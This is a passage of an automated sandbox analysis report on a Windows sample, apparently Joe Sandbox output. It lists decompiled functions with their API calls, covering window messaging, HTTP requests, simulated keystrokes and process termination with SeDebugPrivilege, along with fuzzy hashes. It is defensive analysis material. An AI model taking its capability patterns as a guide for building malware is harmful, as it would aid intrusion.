                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00388C7E
                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00388CB0
                                                    • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00388CE6
                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00388CEF
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: CurrentDirectoryTime$File$Local$System
                                                    • String ID: *.*
                                                    • API String ID: 1464919966-438819550
                                                    • Opcode ID: d0bdacb59d19c59da984c7e449d756679e80068fa1fb831b59ff8156173749df
                                                    • Instruction ID: ad5497d188306f452fde271979acec253a17508647d77deb48668ba0b78a2b9d
                                                    • Opcode Fuzzy Hash: d0bdacb59d19c59da984c7e449d756679e80068fa1fb831b59ff8156173749df
                                                    • Instruction Fuzzy Hash: 12616BB65043059FC716EF60C884AAFB3E8FF89310F44885EF9998B251DB35E945CB92
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 003A45A5 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 101windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CreateMenu.USER32 ref: 003A45D8
                                                    • SetMenu.USER32(?,00000000), ref: 003A45E7
                                                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 003A466F
                                                    • IsMenu.USER32 ref: 003A4683
                                                    • CreatePopupMenu.USER32 ref: 003A468D
                                                    • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 003A46BA
                                                    • DrawMenuBar.USER32 ref: 003A46C2
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: Menu$CreateItem$DrawInfoInsertPopup
                                                    • String ID: 0$F
                                                    • API String ID: 161812096-3044882817
                                                    • Opcode ID: a7150df18fd59d9182d7d05decd5e444d503e2aebd19c7e6aee727f0ffffeaf8
                                                    • Instruction ID: 0890c5b3b4b805d5ac2fc1361b33d68105dac879d6331779f71d3d61b665403d
                                                    • Opcode Fuzzy Hash: a7150df18fd59d9182d7d05decd5e444d503e2aebd19c7e6aee727f0ffffeaf8
                                                    • Instruction Fuzzy Hash: A3414D75A01209EFDF16CF64D894AAA7BB9FF4B314F150128FA46AB360D771A920CF50
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0037276F Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 78windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 0031B25F: _wcslen.LIBCMT ref: 0031B269
                                                      • Part of subcall function 00374536: GetClassNameW.USER32 ref: 00374559
                                                    • SendMessageW.USER32(?,0000018C,000000FF,00020000), ref: 003727F4
                                                    • GetDlgCtrlID.USER32 ref: 003727FF
                                                    • GetParent.USER32 ref: 0037281B
                                                    • SendMessageW.USER32(00000000,?,00000111,?), ref: 0037281E
                                                    • GetDlgCtrlID.USER32 ref: 00372827
                                                    • GetParent.USER32(?), ref: 0037283B
                                                    • SendMessageW.USER32(00000000,?,00000111,?), ref: 0037283E
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$CtrlParent$ClassName_wcslen
                                                    • String ID: ComboBox$ListBox
                                                    • API String ID: 711023334-1403004172
                                                    • Opcode ID: f3023383e9b0e59d80cb58a8797947003d3854886f8b68a6e62f447dc28f31a2
                                                    • Instruction ID: 81c4036be57f1198311309e4c5a8817b2c318e0ed5d698829380a0043765164b
                                                    • Opcode Fuzzy Hash: f3023383e9b0e59d80cb58a8797947003d3854886f8b68a6e62f447dc28f31a2
                                                    • Instruction Fuzzy Hash: FD210771D00114BBCF1AEFA0DC85EEEBB78EF0A310F004156F965972A2CB795809CB60
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00372850 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 77windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 0031B25F: _wcslen.LIBCMT ref: 0031B269
                                                      • Part of subcall function 00374536: GetClassNameW.USER32 ref: 00374559
                                                    • SendMessageW.USER32(?,00000186,00020000,00000000), ref: 003728D3
                                                    • GetDlgCtrlID.USER32 ref: 003728DE
                                                    • GetParent.USER32 ref: 003728FA
                                                    • SendMessageW.USER32(00000000,?,00000111,?), ref: 003728FD
                                                    • GetDlgCtrlID.USER32 ref: 00372906
                                                    • GetParent.USER32(?), ref: 0037291A
                                                    • SendMessageW.USER32(00000000,?,00000111,?), ref: 0037291D
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$CtrlParent$ClassName_wcslen
                                                    • String ID: ComboBox$ListBox
                                                    • API String ID: 711023334-1403004172
                                                    • Opcode ID: e9c551449e3988c00ee870168d8a3592eb102630b5512e7f0609ba2215464e92
                                                    • Instruction ID: 33ede9490266a3faf8993b3d9fa5c18cf28d5ba88a0e7469f5ec5d90f1dabdec
                                                    • Opcode Fuzzy Hash: e9c551449e3988c00ee870168d8a3592eb102630b5512e7f0609ba2215464e92
                                                    • Instruction Fuzzy Hash: 2A210771900104BBCF27AFA0DC45EEEBBB8EF0A300F004046B995A71A1D7794859CB20
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 003A4382 Relevance: 15.2, APIs: 10, Instructions: 182windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 003A43FC
                                                    • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 003A43FF
                                                    • GetWindowLongW.USER32(?,000000F0), ref: 003A4426
                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 003A4449
                                                    • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 003A44C1
                                                    • SendMessageW.USER32(?,00001074,00000000,00000007), ref: 003A450B
                                                    • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 003A4526
                                                    • SendMessageW.USER32(?,0000101D,00001004,00000000), ref: 003A4541
                                                    • SendMessageW.USER32(?,0000101E,00001004,00000000), ref: 003A4555
                                                    • SendMessageW.USER32(?,00001008,00000000,00000007), ref: 003A4572
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$LongWindow
                                                    • String ID:
                                                    • API String ID: 312131281-0
                                                    • Opcode ID: 2b7530a5e8fb3d1f19de5ccee1b8f2f6a193bc6f71f8b9724a60200f5a9db883
                                                    • Instruction ID: d75b9ca0fd9a4f77841f2af05503c9d5eaa1511d3972de921653730f56196676
                                                    • Opcode Fuzzy Hash: 2b7530a5e8fb3d1f19de5ccee1b8f2f6a193bc6f71f8b9724a60200f5a9db883
                                                    • Instruction Fuzzy Hash: 8D617E75900248AFDB22DFA4CC81EEE77B8EF4A310F104159FA14AB2A1D7B4AD45DF50
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0038CBB0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 94networkCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0038CBCF
                                                    • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0038CBF7
                                                    • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0038CC27
                                                    • GetLastError.KERNEL32 ref: 0038CC7F
                                                    • SetEvent.KERNEL32(?), ref: 0038CC93
                                                    • InternetCloseHandle.WININET(00000000), ref: 0038CC9E
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                    • String ID:
                                                    • API String ID: 3113390036-3916222277
                                                    • Opcode ID: 1e39cc538332fdc3c84c7a7f6b5ab87302c5b2044f44ca0538e087024e540b33
                                                    • Instruction ID: 0d0cd3158cedf140af4675f3c7c04e0ac65cbad066861f9729217be6305d2cf7
                                                    • Opcode Fuzzy Hash: 1e39cc538332fdc3c84c7a7f6b5ab87302c5b2044f44ca0538e087024e540b33
                                                    • Instruction Fuzzy Hash: 7931CEB1510304AFD723AF65CD88AAB7BFCEB09740F10155EF44AD6600DB31D9059B70
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0037A12A Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 74windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00355437,?,?,Bad directive syntax error,003ADCD0,00000000,00000010,?,?), ref: 0037A14B
                                                    • LoadStringW.USER32(00000000,?,00355437,?), ref: 0037A152
                                                      • Part of subcall function 0031B25F: _wcslen.LIBCMT ref: 0031B269
                                                    • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 0037A216
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: HandleLoadMessageModuleString_wcslen
                                                    • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                    • API String ID: 858772685-4153970271
                                                    • Opcode ID: a12a0845cfe3da3f484a358ab240460575e675bd29fd80ae77ca86685655a5f9
                                                    • Instruction ID: 4bf8c4303809588d1959e5a4a8e2e6dfbff5d85098a79e36380aad894deb6c04
                                                    • Opcode Fuzzy Hash: a12a0845cfe3da3f484a358ab240460575e675bd29fd80ae77ca86685655a5f9
                                                    • Instruction Fuzzy Hash: 6F21B13280021EAFCF17AFD0DC06EEE7B79BF18304F044455F505690A2EB759A58DB51
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0037292F Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 71windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetParent.USER32 ref: 0037293B
                                                    • GetClassNameW.USER32 ref: 00372950
                                                    • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 003729DD
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: ClassMessageNameParentSend
                                                    • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                    • API String ID: 1290815626-3381328864
                                                    • Opcode ID: d536d249b16b57e5dfefbe4ea890ad164a9f0f40f81d644e240dd17684ddcb8a
                                                    • Instruction ID: 851c2a2ea1eabd843be5e850a5677406ee4584510ca0c4b00466f74433053583
                                                    • Opcode Fuzzy Hash: d536d249b16b57e5dfefbe4ea890ad164a9f0f40f81d644e240dd17684ddcb8a
                                                    • Instruction Fuzzy Hash: 1411E377644306BAFA232721EC07DFB779C8F06720F254013FA09E85E2EB65A8605554
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0038CAA0 Relevance: 13.6, APIs: 9, Instructions: 95networkCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0038CADF
                                                    • GetLastError.KERNEL32 ref: 0038CAF2
                                                    • SetEvent.KERNEL32(?), ref: 0038CB06
                                                      • Part of subcall function 0038CBB0: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0038CBCF
                                                      • Part of subcall function 0038CBB0: GetLastError.KERNEL32 ref: 0038CC7F
                                                      • Part of subcall function 0038CBB0: SetEvent.KERNEL32(?), ref: 0038CC93
                                                      • Part of subcall function 0038CBB0: InternetCloseHandle.WININET(00000000), ref: 0038CC9E
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: Internet$ErrorEventLast$CloseConnectHandleOpen
                                                    • String ID:
                                                    • API String ID: 337547030-0
                                                    • Opcode ID: 663fee1e01746f1e72978d9be9bb7f91d9fd9bb1c8a8a54a0b82eaac475ea6a3
                                                    • Instruction ID: d2bb6f49f64783154e25ede674ec2ec268b7f9edf2ca5f1956c5345fc24446b1
                                                    • Opcode Fuzzy Hash: 663fee1e01746f1e72978d9be9bb7f91d9fd9bb1c8a8a54a0b82eaac475ea6a3
                                                    • Instruction Fuzzy Hash: 5C317871211B05AFDB23AFA1CD45A66BBFCFF09300B14555DF89686A10D731E814DBA0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00372E32 Relevance: 13.6, APIs: 9, Instructions: 60sleepkeyboardwindowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 003742CC: GetWindowThreadProcessId.USER32(?,00000000), ref: 003742E6
                                                      • Part of subcall function 003742CC: GetCurrentThreadId.KERNEL32 ref: 003742ED
                                                      • Part of subcall function 003742CC: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00372E43), ref: 003742F4
                                                    • MapVirtualKeyW.USER32(00000025,00000000), ref: 00372E4D
                                                    • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00372E6B
                                                    • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 00372E6F
                                                    • MapVirtualKeyW.USER32(00000025,00000000), ref: 00372E79
                                                    • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00372E91
                                                    • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000), ref: 00372E95
                                                    • MapVirtualKeyW.USER32(00000025,00000000), ref: 00372E9F
                                                    • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00372EB3
                                                    • Sleep.KERNEL32(00000000,?,00000101,00000027,00000000,?,00000100,00000027,00000000), ref: 00372EB7
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                    • String ID:
                                                    • API String ID: 2014098862-0
                                                    • Opcode ID: 92c53b123191fd8ab2fe3917c5dc9b5ba72199db53d1d3021a642c9600388342
                                                    • Instruction ID: d19778187aa5bac5352de870344895d69cb72fa8ea18cea312edc2223c220404
                                                    • Opcode Fuzzy Hash: 92c53b123191fd8ab2fe3917c5dc9b5ba72199db53d1d3021a642c9600388342
                                                    • Instruction Fuzzy Hash: EA01D8313802147BFB2167699C8AF567F5DDB4AB11F105001F319AE1F1C9E22445CAA9
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00372093 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetProcessHeap.KERNEL32(00000008,0000000C,?,00000000,?,00371CD9,?,?,00000000), ref: 0037209C
                                                    • HeapAlloc.KERNEL32(00000000,?,00371CD9,?,?,00000000), ref: 003720A3
                                                    • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00371CD9,?,?,00000000), ref: 003720B8
                                                    • GetCurrentProcess.KERNEL32(?,00000000,?,00371CD9,?,?,00000000), ref: 003720C0
                                                    • DuplicateHandle.KERNEL32(00000000,?,00371CD9,?,?,00000000), ref: 003720C3
                                                    • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00371CD9,?,?,00000000), ref: 003720D3
                                                    • GetCurrentProcess.KERNEL32(00371CD9,00000000,?,00371CD9,?,?,00000000), ref: 003720DB
                                                    • DuplicateHandle.KERNEL32(00000000,?,00371CD9,?,?,00000000), ref: 003720DE
                                                    • CreateThread.KERNEL32 ref: 003720F8
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                    • String ID:
                                                    • API String ID: 1957940570-0
                                                    • Opcode ID: 798db92c1f13585a5977c5637ce279407c040d00a434b480e51e16dda66b9ba1
                                                    • Instruction ID: a7f174084deb59c4a5c6e0b600c17ed1f11654d36a48796962eef7577af48333
                                                    • Opcode Fuzzy Hash: 798db92c1f13585a5977c5637ce279407c040d00a434b480e51e16dda66b9ba1
                                                    • Instruction Fuzzy Hash: AE01CDB5240308BFE751AFA5DC4DF6B3BACEB8A711F404411FA05DB5A1DA749800CB20
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0039AA41 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 160COMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 0037DC9C: CreateToolhelp32Snapshot.KERNEL32 ref: 0037DCC1
                                                      • Part of subcall function 0037DC9C: Process32FirstW.KERNEL32(00000000,?), ref: 0037DCCF
                                                      • Part of subcall function 0037DC9C: CloseHandle.KERNEL32(00000000), ref: 0037DD9C
                                                    • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0039AACC
                                                    • GetLastError.KERNEL32 ref: 0039AADF
                                                    • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0039AB12
                                                    • TerminateProcess.KERNEL32(00000000,00000000), ref: 0039ABC7
                                                    • GetLastError.KERNEL32(00000000), ref: 0039ABD2
                                                    • CloseHandle.KERNEL32(00000000), ref: 0039AC23
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                    • String ID: SeDebugPrivilege
                                                    • API String ID: 2533919879-2896544425
                                                    • Opcode ID: 6e3638c47bd0152912aab9ab867d6544efadee27c8da5830f709fe66b30fc729
                                                    • Instruction ID: 09ca8c84b787850e4d316d6387fbcc8028760079e71dbb470921034b8fddb61f
                                                    • Opcode Fuzzy Hash: 6e3638c47bd0152912aab9ab867d6544efadee27c8da5830f709fe66b30fc729
                                                    • Instruction Fuzzy Hash: C361C230208602AFDB26DF18C494F16BBE5AF44318F19858CE4668FBA2C775ED45CBD2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 003A41E5 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 141windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 003A4284
                                                    • SendMessageW.USER32(00000000,00001036,00000000,?), ref: 003A4299
                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 003A42B3
                                                    • _wcslen.LIBCMT ref: 003A42F8
                                                    • SendMessageW.USER32(?,00001057,00000000,?), ref: 003A4325
                                                    • SendMessageW.USER32(?,00001061,?,0000000F), ref: 003A4353
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$Window_wcslen
                                                    • String ID: SysListView32
                                                    • API String ID: 2147712094-78025650
                                                    • Opcode ID: f7a994c644937d7477e0fdd1cada414b6bf4d08516168dbe0eaf316a4fecc237
                                                    • Instruction ID: b11f4cb125ab8032b9e6d21ee43a98ee7a4fdf49a3e558a2182b3ae46e8366ee
                                                    • Opcode Fuzzy Hash: f7a994c644937d7477e0fdd1cada414b6bf4d08516168dbe0eaf316a4fecc237
                                                    • Instruction Fuzzy Hash: 6341BE71A00318ABDF229F64CC49FEA7BA9FF49360F110526F954EB291D7B19990CB90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0037C53A Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 137windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 0037C5D9
                                                    • IsMenu.USER32 ref: 0037C5F9
                                                    • CreatePopupMenu.USER32(003E2990,00000000,762D33D0), ref: 0037C62F
                                                    • GetMenuItemCount.USER32 ref: 0037C680
                                                    • InsertMenuItemW.USER32(00DD9580,?,00000001,00000030), ref: 0037C6A8
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
